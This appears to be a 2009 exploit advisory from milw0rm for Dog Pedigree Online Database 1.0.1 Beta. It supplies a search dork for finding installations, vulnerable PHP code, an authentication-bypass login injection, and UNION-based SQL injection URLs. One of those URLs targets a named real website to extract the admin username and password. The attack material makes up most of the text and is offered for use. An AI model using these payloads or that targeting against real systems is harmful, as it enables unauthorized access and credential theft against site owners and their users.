Loading ...
Global Do...
News & Politics
5
0
Try Now
Log In
Pricing
1 *********************************************************************************************** 2 *********************************************************************************************** 3 ** ** 4 ** ** 5 ** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** 6 ** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** 7 ** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** 8 ** [−−−−−[]−−−−−[][][][>−−[]−−[]−[]−−−[][][]−−[]−[]−−[]−−−−−−−−[]−−−−−[][][][>−−[][][][]−−−\ 9 **==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>−− 10 ** [−−−−[[]]−−−−[]−−− −−−−[]−−−−−[]−−−[]−−[]−−−−−[]−−[]−−−−−−−[] []−−−[]−−−−−−−−−−[]−−[]−−−/ 11 [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** 12 ** ** 13 ** ** 14 ** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ** 15 ** ¡PROUD TO BE SPANISH! ** 16 ** ** 17 *********************************************************************************************** 18 *********************************************************************************************** 19 20 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 21 | MULTIPLE SQL INJECTION VULNERABILITIES | 22 |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−| 23 | | Dog Pedigree Online Database v1.0.1−Beta | | 24 | CMS INFORMATION: −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− | 25 | | 26 |−−>WEB: http://thewhippetarchives.net/twa_is_offline.php | 27 |−−>DOWNLOAD: http://sourceforge.net/projects/dogarchive | 28 |−−>DEMO: N/A | 29 |−−>CATEGORY: Genealogy | 30 |−−>DESCRIPTION: This project allows to setup and maintain a database for | 31 | collecting (dog) pedigrees. The data will actually be collected... | 32 |−−>RELEASED: 2009−01−25 | 33 | | 34 | CMS VULNERABILITY: | 35 | | 36 |−−>TESTED ON: firefox 3 | 37 |−−>DORK: inurl:"printable_pedigree.php" | 38 |−−>CATEGORY: AUTH−BYPASS / SQL INJECTION (SQLi) | 39 |−−>AFFECT VERSION: <= 1.0.1 Beta | 40 |−−>Discovered Bug date: 2009−05−08 | 41 |−−>Reported Bug date: 2009−05−08 | 42 |−−>Fixed bug date: 2009−05−12 | 43 |−−>Info patch (v1.0.2): http://sourceforge.net/projects/dogarchive/ | 44 |−−>Author: YEnH4ckEr | 45 |−−>mail: y3nh4ck3r[at]gmail[dot]com | 46 |−−>WEB/BLOG: N/A | 47 |−−>COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | 48 |−−>EXTRA−COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | 49 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 50 51 52 ##################### Page 1/4 Dog Pedigree Online Database 1.0.1b Multiple SQL Injection Vulns YEnH4ckEr 05/19/2009 53 //////////////////// 54 55 AUTH−BYPASS (SQLi): 56 57 //////////////////// 58 ##################### 59 60 61 <<<<−−−−−−−−−++++++++++++++ Condition−1: magic_quotes_gpc=off +++++++++++++++++−−−−−−−−−>>>> 62 63 64 −−−−−−−−−−− 65 VULN FILE: 66 −−−−−−−−−−− 67 68 69 Path −−> [HOME_PATH]/php_users/htdocs/processlogin.php 70 Lines −−> 69−73 71 72 ... 73 74 $sql = sprintf(" 75 SELECT userId,status,email,seclev FROM $USERS_DB.users 76 WHERE username=’%s’ AND password=’%s’", 77 $_POST[’username’], 78 md5($_POST[’password’])); 79 ... 80 81 82 −−−−−−−−−−− 83 EXPLOIT: 84 −−−−−−−−−−− 85 86 87 Username=’or 1=1# 88 Password=nothing 89 90 91 92 ################ 93 //////////////// 94 95 SQL INJECTION: 96 97 //////////////// 98 ################ 99 100 101 This aplication is completely vulnerable to sql injection. I only show an example. 102 103 104 −−−−−−−−−−− Page 2/4 Dog Pedigree Online Database 1.0.1b Multiple SQL Injection Vulns YEnH4ckEr 05/19/2009 105 VULN FILE: 106 −−−−−−−−−−− 107 108 109 Path −−> [HOME_PATH]/manageperson.php 110 Var −−> GET var ’personId’ 111 Lines −−> 28,29 112 113 ... 114 115 if (empty($currId)) 116 $currId = $_GET[’personId’]; 117 118 ... 119 120 121 Lines −−> 164−165 122 123 ... 124 125 $query = "SELECT * FROM person WHERE id=$currId"; 126 $result = mysql_query($query) or die(’Query failed: ’ . mysql_error()); 127 $line = mysql_fetch_object($result); 128 129 ... 130 131 132 −−−−−− 133 PoC: 134 −−−−−− 135 136 137 http://[HOST]/[HOME_PATH]/managePerson.php?personId=−1+UNION+ALL+SELECT+1,version(),user(),database(),version(),user( ),database(),version(),user(),database(),11,12%23 138 139 140 Return −−> Database version, user and name. 141 142 143 −−−−−−−−− 144 EXPLOIT: 145 −−−−−−−−− 146 147 148 http://www.gavgavclub.ru/tree/managePerson.php?personId=−1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),user (),database(),version(),user(),database(),version(),user(),database(),11,12+FROM+users+WHERE+userId=2252%23 149 150 151 Return −−> username:::password 152 153 154 **Note: Admin user id is 2252 by default Page 3/4 Dog Pedigree Online Database 1.0.1b Multiple SQL Injection Vulns YEnH4ckEr 05/19/2009 155 156 157 158 <<<−−−−−−−−−−−−−−−−−−−−−−−−−−−−−EOF−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−>>>ENJOY IT! 159 160 161 ####################################################################### 162 ####################################################################### 163 ##*******************************************************************## 164 ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## 165 ##*******************************************************************## 166 ##−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−## 167 ##*******************************************************************## 168 ## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!## 169 ##*******************************************************************## 170 ####################################################################### 171 ####################################################################### 172 173 # milw0rm.com [2009−05−19] Page 4/4 Dog Pedigree Online Database 1.0.1b Multiple SQL Injection Vulns YEnH4ckEr 05/19/2009